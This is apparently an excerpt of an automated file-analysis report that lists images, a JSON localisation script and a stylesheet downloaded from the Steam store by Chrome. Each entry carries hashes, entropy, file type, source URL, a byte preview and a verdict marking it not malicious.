        SSDEEP:96:dwfXuGRkRwP9sfKFJHUqgcvG0vEx2MbDEuox+cFzRMdBcPkMlpI16O3o99xTj:mfNl1MSHUqgAGVnkXxpFzwKPkIoG
        MD5:E1C4EC18E951C719D17BB6D24EAF9C31
        SHA1:3D6740E2F540BD6C1C0C30A262F1108C757B9AA4
        SHA-256:2EDF08EA9F5C55AD01FE459A61DC61E50353912E82A19A39AB4FDA32B879723B
        SHA-512:05D92B51ACE71853B9987C70DB090804E8088D3321D14B02367598909189902B4B930D5CCD8E6E7A95F2DB473D2F025BCF794F66A2D8FACD2AF515F3D5501D11
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/39210/capsule_184x69.jpg?t=1711488174
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................D............................!."1A..Q#2aq...BR..$...3r...%&'CD....................................1.....................!1..AQa."..#q....2BCR.................?...@*...............}.l)5..U\q.....J...[...Z2...A...uX'.ridcu3.U#a..%.@.._-..l..9..rc..:....AG..B..H:.DO...~..t.h.^5.....].]....\.!*!..Q.....O.....Lk.?.V..wekMn#. .w.....S..Q..!$x.q'.q9.?t...F..'O.8w.~..m...sU92.....T.-!...1.^.G.C.^.._....T.m.......3m..f.|.e..nx%i..9yB...C.{....v7x.[.=`.b..q.Pr...-.K..5`$....g..ZaR...XQ.cu..:UM.+U.T.2<`..[...PV...Np.@..#...5......g...{...S.*Qi.**h..]..O........... .8Rn..[......:I.o...[.:.B..dxi..<R.>.^....[.......t...t.zn.[.......UM...J[Qq......x..@......].o^......cw)..UF.1W..x\....0.p.]Onc'>...-.{|.7:..m..{3P......E....,2.C....y].!......].2RuBv..Jm..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 184x69, components 3
        Category:dropped
        Size (bytes):4885
        Entropy (8bit):7.889061659250527
        Encrypted:false
        SSDEEP:96:eZTacl4Ou+zZIQ+Oql9Q44gMoRmMlEDT9BQXHCenkhSOto/cH:fM40h+O+y4tMog6EDT9BeCen02/cH
        MD5:656419A3E21278B5436923361D73C3B1
        SHA1:C41A2A6EAEB0D9B5582366E9B249BCE797C2F2A7
        SHA-256:3FB6E915493ECDD5E2F78F87FAE06202D41E28432E76CF837896BDA95A50EAC9
        SHA-512:00733B69EDE2DB25BA9C0F7B80161F0B9A6BE226BE3917B8B10B18E43080027E9930EDB4DDAEEB933F1B7CEB3B945FDE3F267FC3AC0C15443069BCB102395942
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................<..........................!..1A.."Qaq..#2BR....3.%r..CD..................................1.......................!.1.Aa...Q..DRq.."#2B...............?....``..%...Gr.....9.8.L...K...0-..T..Hq^.3.Xn..R:.lA(.KE~.&l./.S.)..*.~.......q..#;./.4TP.[.lE.....Z..G.P..me.( ...c..A..S.....;.R...P.R..on../.e,...>|.C..L8......!..._m:..VH.$......YDwSs.CS_K`.%d......|rS......`..`....C.`..<....d`S">..]..a......t0.m.r....S.9...b..&(..4..+.%.7q......._.6..&:..p..)I....u..{'.e.....#.6..j..V.%.IV..jH...1.c.1"EY.u..{.W...,.|j...[-).=b.Pi..T.{n8.Rl.Yr.M.6.....nQP.TJ..q.........`......(`....l`.|.....noze7/..E..Z.P&..,-I)..U.#...3o2..@\4...p..%...-.^...H.H==...f\..j...k...T.)m.#...c&[.n.....^".4.............5%...H*.n.P.....4N..).\.]z.v...l[i*.l.,A.P......&x0...Ze.8...4.6.$..a.]).R.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:downloaded
        Size (bytes):4024
        Entropy (8bit):7.871554651450583
        Encrypted:false
        SSDEEP:96:vmuXBHvM4lXRBSfU0IoXH3o2SIf0XSn1rUSgM3Xs2u:Ou1M2RhwXmIf/4SMt
        MD5:759FA45B2024F007710DC3FB302D3FA7
        SHA1:3DB3E21C1FFAB35E7A525CA9810B1B77CCB12CFB
        SHA-256:C50F1BE1495C08E0B72B260D002114BD7E4062E772878EC672A4E2F29092FF85
        SHA-512:8E26C159B1546BA0590384C6F2ECB12D0AFDD8C255EA3159C08F1E51AD075B62BE4F090D28C54DAD3129535CFC4152697C2EC71414236CB6A64D61915B91F0D4
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/ss_befdb7e7851e809e6910fb202e57212cae193d51.116x65.jpg?t=1705420866
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s............................................E.........................!1...AQa."2q.r....345Rst...7Bb.#$6C.......................................6......................!..1AQ.."2q..34a......#r.$................?..):S)...C!.l.\.|z`#P..:+t....?}.R..d]. Tn.../.0......5[. .\..cjH.jg......,Ruk.)...M.4.y.......}.._. .S(b....I...%.E.7Q'...{..k..}.&Q..........v.q..9Rj|.Jb....pd..d.`r.A..'u..Ql.!...<).y*fzHrW......B...aQt....F..J SjL.(P.....b...'tS*.:Dq..0..Q.B_5E.c.....\...^...JUUG....... .m..F%.!c.$X.g!....$..9..?,Wv&tLm0....(....P.a.(..&S...M..t.OU..!.X.2..[{Z...LJ..y...r1.C.$}...C.1.B..m.....*A]Csn..8...DE...E]..cu...].x,..H.Uou...8^bS`.h.b.t..0;.v......&..L....t.....P..s...E.c..m.. .tz.-...l(.Q.Q%.f..I.....J` %5......."I..r.2Vk...B.z.#(S+....4.t..=]=]d...D..V..a..o..p...F.*.m..}J=x....x..Fe.D,+i$.x.jV
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 92 x 26, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):2843
        Entropy (8bit):6.967423493204583
        Encrypted:false
        SSDEEP:48:o2/61MYLNnwknA9WpitbEsg9wlO/cHJ3z3VHi3bEs/Hc5mmDhhIZwldFWbd/9maH:/SyYRwknmWpiVbgx/mHqb/Hc5thdlubX
        MD5:41E851F8E42B6BF3414278871E93E8A2
        SHA1:A3811C7E1157F77950EC1F0558293BC90E432E82
        SHA-256:399F74C4E69EAC8B59B149293F9A573955FEF0A62B242CFA70346070013E0966
        SHA-512:F3C3549F1390B52791196E6F19584CBD4C4DB2B51FEF78C9C607C944079FED69B75E8F88594C3D647F2DDC29F282BF41BE455BE328AB27C091B4A37C41B00965
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...\.........:.;)....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmp:CreateDate="2019-08-09T13:37:29-07:00" xmp:ModifyDate="2020-06-17T17:39:04-07:00" xmp:MetadataDate="2020-06-17T17:39:04-07:00" xmpMM:InstanceID="xmp.iid:a6176093-d0df-1f4a-86f8-26e70acca1dd" xmpMM:DocumentID="adobe:docid:photoshop:5cf069c4-c89c-fa4c-8c00-dff9f3add583" xmpMM:OriginalDocumentID="x
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):1161
        Entropy (8bit):6.483902966293242
        Encrypted:false
        SSDEEP:24:2C1hkyaWwjx82lY2T3RVNxhpyJ3Vlt8vmG8ll6f7iX:HZNn2lPzoJ3PtQmBY0
        MD5:E406E5A22E4F3CFA580D3BB57420150E
        SHA1:5B381E535BB0CE6003A461F3124FA1238DFBCEDB
        SHA-256:760589F903C5E9BD169B38F941F9A3DC88A23897E9CC5B622D3D91F5C204B9E4
        SHA-512:E33CB7BD10104A1E8C2D3F2B3885D65EF3769F7250445C8341D6D2AD2367749CCDC48DAABE4EA39CB80EE0362AF9D01E48370DB858BA01F956A1A6B8C04217C1
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<...'iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.1 (Windows)" xmpMM:InstanceID="xmp.iid:399EA8C592D411EE91E8F6773DB0009B" xmpMM:DocumentID="xmp.did:399EA8C692D411EE91E8F6773DB0009B"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:399EA8C392D411EE91E8F6773DB0009B" stRef:documentID="xmp.did:399EA8C492D411EE91E8F6773DB0009B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.d......IDATx.b..U.d``.......@...4.....0......PWU.p..Q....1\=...2I.\Fg.&3de.....BX..4 ...L...!#....... )!..7m..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 306x260, components 3
        Category:dropped
        Size (bytes):45706
        Entropy (8bit):7.973721562316231
        Encrypted:false
        SSDEEP:768:6eq4SUEXUkn9qIWtKR+n+rpEn6AbPUcBSr9xJAyNlI:6e7mUknXIKren6AJSB3Ab
        MD5:FBAC15CC71AD38851394CE62B9769ABE
        SHA1:3723B97BDCA23AC999300FF675949053C596628F
        SHA-256:8A379FA650EF9584A4280D1248C81D81FBD33E808A36912C3DBB7833823EAA66
        SHA-512:C5EFE0AAAD897A22C1495E4983C6484B3FBE9E4F24DF31BED6219C8B60AFA55E5AA74F8EE540D72D64A37E94C2A2235AD071B191874E9F88E7889209232A354A
        Malicious:false
        Reputation:low
        Preview:......Exif..II*.................Ducky.......<......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.dba3da3b5, 2023/12/15-10:42:37 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:dfeb4610-6244-e148-8a22-5adb8a23da6d" xmpMM:DocumentID="xmp.did:F75C77F6192611EF9A75BEA82E65EE70" xmpMM:InstanceID="xmp.iid:F75C77F5192611EF9A75BEA82E65EE70" xmp:CreatorTool="Adobe Photoshop 25.7 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:dfeb4610-6244-e148-8a22-5adb8a23da6d" stRef:documentID="xmp.did:dfeb4610-6244-e148-8a22-5adb8a23da6d"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............................................
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):1161
        Entropy (8bit):6.483902966293242
        Encrypted:false
        SSDEEP:24:2C1hkyaWwjx82lY2T3RVNxhpyJ3Vlt8vmG8ll6f7iX:HZNn2lPzoJ3PtQmBY0
        MD5:E406E5A22E4F3CFA580D3BB57420150E
        SHA1:5B381E535BB0CE6003A461F3124FA1238DFBCEDB
        SHA-256:760589F903C5E9BD169B38F941F9A3DC88A23897E9CC5B622D3D91F5C204B9E4
        SHA-512:E33CB7BD10104A1E8C2D3F2B3885D65EF3769F7250445C8341D6D2AD2367749CCDC48DAABE4EA39CB80EE0362AF9D01E48370DB858BA01F956A1A6B8C04217C1
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/images/ico/ico_facebook.png
        Preview:.PNG........IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<...'iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.1 (Windows)" xmpMM:InstanceID="xmp.iid:399EA8C592D411EE91E8F6773DB0009B" xmpMM:DocumentID="xmp.did:399EA8C692D411EE91E8F6773DB0009B"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:399EA8C392D411EE91E8F6773DB0009B" stRef:documentID="xmp.did:399EA8C492D411EE91E8F6773DB0009B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.d......IDATx.b..U.d``.......@...4.....0......PWU.p..Q....1\=...2I.\Fg.&3de.....BX..4 ...L...!#....... )!..7m..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 600x337, components 3
        Category:downloaded
        Size (bytes):100928
        Entropy (8bit):7.984906911731841
        Encrypted:false
        SSDEEP:3072:DycblOoLgLbJDAme9W9+uSmLBFeSvnbgOd:DycblOTLbeeISvnLd
        MD5:DB8D544763D1D2EFBBDA38B49002869D
        SHA1:A1D6474F4006B0653626C60558DCEC2053501181
        SHA-256:611BB301F20152F8406722AE6BBEEB57A6E2D7049C605970E55301A5910FD3A0
        SHA-512:FB4BD1EFB4F65DE151A850CFECDFC1FD4B17AEB83D6392610390EA3FC079ADC482CA8F234250892647646229F5F914D7BDFBC343A31DE5A076043494BFB9DB08
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1085660/ss_a9642404e586be28f856e8f02d038828f691a5ba.600x338.jpg
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................T........................!..1.."AQa.q..2...#BR...3br..$4...5CSs......%c.6D..T.u....................................C........................!1AQ.."aq..2.......B..#R..3C.Sbr.$...4D..............?.cALr6..(...l(..^.Q...0.vA..vc.4]9..u....E...Jpp0>gV%Y.....9...MH+...4...%....=A!M....B#B..._M,.U(..5.....0Ggt.9.:.Q..A..Jdl.4-..e.FF}4[V..%.^..C..Os....a...}.j..F.5:..(.|.Z..j..+....\.....Y.C.R........f.U:....T.P...KYF.4.:j9.9.c.'.z....{K...d.bg.D...5.n.....PPV.i..!P.l..uW........Df....|.W....`...U.6.X..7.z..I...$.2.V....'T..,._.......M.....R..yd.r....$..6.s...g.1..El.R@@..L.N...o.Q.)..^.....nV......+..$...@:..........g.|Z....'V)$..%y.f._3....+.Q*:X. ...G....|.......U...<...+........p.w^Ps.?.RFr...EqY.Z6.H......XH...."...*.........w... .Wr......5iJ.q.N
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Unicode text, UTF-8 text, with very long lines (64904), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):171820
        Entropy (8bit):5.091592907461997
        Encrypted:false
        SSDEEP:1536:js4PKffp9FVf2HBeZTjxI1slCWW9sEbsgsfRc117tUCqU3A8yWiSgzgPMNSrf:js4PKfx/VhTjHlCNOEArfKrxRJS+D
        MD5:BD3FBFE0A71FC9C9925BD611F823A1E4
        SHA1:C5E1A3DDB20C8FB894E069310BDF05DC655F2FA6
        SHA-256:69ADB0AF90853345093AFAD207BA98622F7D2FCC9AE1365D1C89B267F7F10D4D
        SHA-512:6E279402479886777224CB092AEE8B76D917DA3D50C255E5689AE71BC338F97ED7E32A9A0F8A9F9B2DF04416A008E257BB7045C3428C10416B8B48834784504F
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/javascript/applications/store/sales_english-json.js?contenthash=2427041da1c36f76f959
        Preview:.........../**** (c) Valve Corporation. Use is governed by the terms of the Steam Subscriber Agreement http://store.steampowered.com/subscriber_agreement/. ..****/.."use strict";(self.webpackChunkstore=self.webpackChunkstore||[]).push([[7952],{12445:e=>{e.exports=JSON.parse('{"language":"english","Summer2022_hunt_Intro":"Greetings from the Future!","Summer2022_hunt_Intro_1":"I am Clorthax, a time-traveling trickster! I know what you.re thinking: \\"A professional trickster? This sounds like a trick!\\" That is a reasonable concern! But what I am about to tell you is not a trick, and to prove it, I will type it in all caps: THIS IS NOT A TRICK.","Summer2022_hunt_Intro_2":"Okay, it.s a trick. But only on the people of the future! You.re going to love this. Why? Because I have stolen the ten best games from the far future, then traveled across an ocean of time to sell them to you! Exclusively on Steam!","Summer2022_hunt_Intro_3":"Anyway, I can.t outright tell you the names of thes
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 460x210, components 3
        Category:downloaded
        Size (bytes):42384
        Entropy (8bit):7.964249802214873
        Encrypted:false
        SSDEEP:768:Do1ay3y5dnaBMFGW8t/fHF8pSAkTKKh51RlmkNeZS3DzWv/Dj/CwrbdoFLojxRRt:DoLy5saG/fHFtKKbUUDc7dtiqRqS
        MD5:B79DA7BD00E77BD7A9B725AD047B4B64
        SHA1:C0E007B7159F32C30867FFB4C64EE9BC2298C4F3
        SHA-256:3904B94F82509E8511A6F706CB5745D9C74B0CA57937360009798D315778CF9F
        SHA-512:CF7447D735B41DACA54471D575330E22AFA92F63C6E87E64808322448CE2C66E074EBE9E523473C339C10EDF52D2AF4AE65F2F16243BEDAD169C0A251004F56A
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/207490/header.jpg?t=1698436569
        Preview:......JFIF.....H.H.....C....................................................................C............................................................................"..........................................O.........................!..1A..Qa."q.2...#BR...$3Cbr.4S...%D.....'5Tcst.U....................................B........................!1.AQaq.."...2........#BR34br...$5Cs................?.....I.#.[.=....=u5.4...Gm......Z.a .7.....S.hW.r5..R5..'JP.F.4.)TWq...KQ..k.I.t....:CR ...u.TRv:.6..i.5mC......n...k* .ii......0@.X.g_Ru.}fR.....Y6GS.....V.Nu.6..[....v.+...^.c.....+.I..N..J.mk...J.1BkZB.u./.}d.3...v..W.......$.h9.....l}5.#.~c.,..!..G.2..R.F...;.K.NiI'.g.i......J.....V..J....T......v....u..]Gm<..BT..J.aOs......T..$S......J...HU..kS..zivi..S.s.z.b%'.dj<......'HSNK.O.p##X......Z1.k4.X...6jN.S.....4);.r$.^..T.`.....n.z.t.....k...,..r..{.8...^WM.N.....^3.....pR.P.#.b.V......8..+...N.CIY.5....T'..F...<q.0..G.c.uy.J..e....t.9..=..T.o..r...*H..g@.G......pq.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 52 x 32, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):1304
        Entropy (8bit):6.772235775690999
        Encrypted:false
        SSDEEP:24:11hpunQWwjx82lY2T32HEVfAhyJ3VyZS1Gq3xB/xQ+42tgdUikMxC1bLZ/GThFG:bitNn2VR7J3HBrxO2gK8xC1bLVGTa
        MD5:CEAF33760EC020397F3145A9C908C149
        SHA1:096521D8EED404FBA65D00A3AB80BDB75CC3376A
        SHA-256:F9D757CD0FEE8F9998DEB01AA80051E6D4CF8C348E7597217D647B69F8AFAF2A
        SHA-512:F6FEA151F15EDC820F8F43EB04B89D06ADA58B6DD7EFD4D88B18723086E032A36A2D973C19E1B6448DA982EF3E86002EF76F259A8F3020EB6DF314A44EABAB2F
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...4... .....]?[f....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:DDED5249601311E69592F68D70324B45" xmpMM:DocumentID="xmp.did:DDED524A601311E69592F68D70324B45"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:DDED5247601311E69592F68D70324B45" stRef:documentID="xmp.did:DDED5248601311E69592F68D70324B45"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..p.....IDATx.b...?.p.......R..d ..bi.]@....... >@.[A...6.....Z.M.....S@.K(,..../P.r&.D....a.&.`j[N..i.H.y.....Xbm.y..2
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 600x337, components 3
        Category:downloaded
        Size (bytes):106862
        Entropy (8bit):7.976963116284103
        Encrypted:false
        SSDEEP:1536:bW5kMUH9OBwbFwBo0PRnw3nnV8LrjfynC5o1A8x5DNQxSoRo2sxCLMronHljWabo:qKdOqbWbJwXErjf95o1TrGx/Ro5CL0Mo
        MD5:0643BE00B28E177774CC634A1636E1DA
        SHA1:D7CB603EBA5D7AA8062A6B40EC93190F93EA5081
        SHA-256:3EFAE2A18709B6EEED16EAD26109E3D4BCD07ABFCA97E748F5102A3E6FC1F6A7
        SHA-512:27D9C9883B6F1A2E7344B9F0DF2FF3E225D3C5977E261526B937E7F6CF1E4AE75DEC7B15E26781FB9A8B42F880538DA12BBA08CA52BDEBA1040E84AF1670303C
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1085660/ss_7fcc82f468fcf8278c7ffa95cebf949bfc6845fc.600x338.jpg
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................S.........................!.1.."A.Qa2q...#B....3R...$456brs....%7tu..C..S....c.....................................A......................!..1AQa.."q.......2...#3.Br.4R$b..5%CS..............?...^.7.)>.W............O'.e..=.f.'.....J..i.........;.l....r4E.$.....>.t....m.R.Sy.....x...... .h.a'u4.].4..5d{.Ie..N..K.&......\H.m.l........T...}Y...cC%"...P.r.)i.Y.2.?T.r..cLp.D_.......3oi..$..^..U....{|O$tw._..".\m...wd.q.K-pa.C.&....b.R.}=w.n..W...u.:....7.g mc..\..n.F..P.l-;O....;.*74k%ZWia.E(.... ...(......8..|.a...t[...#hp.#^.tV.t...VEO..F.e.w..l..1. .~..}.6.;...J...".[.......o..$.7.P..{r. ....vx.....c........V....Q..Nhh.{..BQ...2.PNH....<.I..{.)....<%9.g...:..>$x.l.Jjar.T.......'.....y<...g.FVGh\D.o^..... 0.....+0I...q..Y ..Vy....6......9...,.1.p..s.l....t.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 600 x 240, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):227012
        Entropy (8bit):7.985285041807569
        Encrypted:false
        SSDEEP:6144:8cNSj2UuvOsDvFBAQBBk/87mpKYkOkOWLQbBRf:8cNKorzFrBBk/87z1zLQbBRf
        MD5:D2B08C2C0A2F0B110AAD03937A3E3A14
        SHA1:9DCECE7F9E5FB9153E96B224CA4562104FC5A41E
        SHA-256:E63B400C20FFC566B15CC7FC9F9F945AEA18751FDCC9A47D195742078A333C97
        SHA-512:38C9D99A33733C92E25387FAC43A4BCED99D3BDDAD16DFADA34D039D877CE76A464D15E2BE32A290F45D6ABC202F378352E33D1FB8D5B9E37D1FCEE487910EAC
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...X...........v....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899, 2023/06/25-20:01:55 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop 22.4 (Windows)" xmp:CreateDate="2021-08-02T17:48:06+03:00" xmp:MetadataDate="2023-12-01T15:46:49+02:00" xmp:ModifyDate="2023-12-01T15:46:49+02:00" dc:format="image/png" xmpMM:InstanceID="xmp.iid:da48ed39-939b-ba4a-b232-6f73c075c84c" xmpMM:DocumentID="adobe:docid:photoshop:a18b4702-78b7-0e43-8910-46028d8efdd9" xmp
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 20 x 20, 8-bit/color RGBA, interlaced
        Category:dropped
        Size (bytes):1360
        Entropy (8bit):6.773253103418387
        Encrypted:false
        SSDEEP:24:+y1he91Wwjx82lY2T3ouVGcUWSdoyJ3Vblt3bGlH0MMRsimfvlw:+wqQNn2xhJSdrJ3Flhb/Mimfvi
        MD5:F80E8AD0C744077C189C95726A41A13F
        SHA1:2220CF2E998ED605B974BD0088524832CE896D3A
        SHA-256:DF56BAE04E49BFA572E00837B378194D95530FA915EDF5ADC76E09E0E8F4AB13
        SHA-512:EFA8EF646F517896D597129D167767537D7D00315070230BD6988D85E585433FF321B3504CE1DA3518FB8B4C014797C76F329BDFAB10A060E097A53067BBE7A9
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...............-.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:AA4360FFA29F11E6BD31A92153A0CB29" xmpMM:DocumentID="xmp.did:AA436100A29F11E6BD31A92153A0CB29"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:AA4360FDA29F11E6BD31A92153A0CB29" stRef:documentID="xmp.did:AA4360FEA29F11E6BD31A92153A0CB29"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..c.....IDATx.b...?.....FFF...L.... ......q.@...b...9.....PAv ..J... .C......(.....b{.d...pg@..C.... ...0...@......,d9
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with CRLF line terminators
        Category:downloaded
        Size (bytes):2682
        Entropy (8bit):5.181729418329873
        Encrypted:false
        SSDEEP:48:y3/p1p6iBbbjR3+Mufk5kSR3+MufkywR3+MufktStR3+MufkFXR3+MufkRCR3+MA:ip1p6eUMuptMuJjMuoFMuAoMuYdMuxwG
        MD5:D82D4E87D405553C8AA398E16659FBF8
        SHA1:6D046F98095EF625E5C81545E4B4FAEAF1F2A45D
        SHA-256:AFB487CB0927509900A94F5FE65E9FA66C264A1524D21DD7AFAA4C75386E2DD2
        SHA-512:761226A62727B51165125FC36D3FAC567991192795BB53058A9E4C5B95A2EE001E8053977D8F71079027425B0C11D21A244CF685C7A05DFEB0DDC2E76023EE70
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=2C1Oh9QFVTyK&l=russian&_cdn=cloudflare
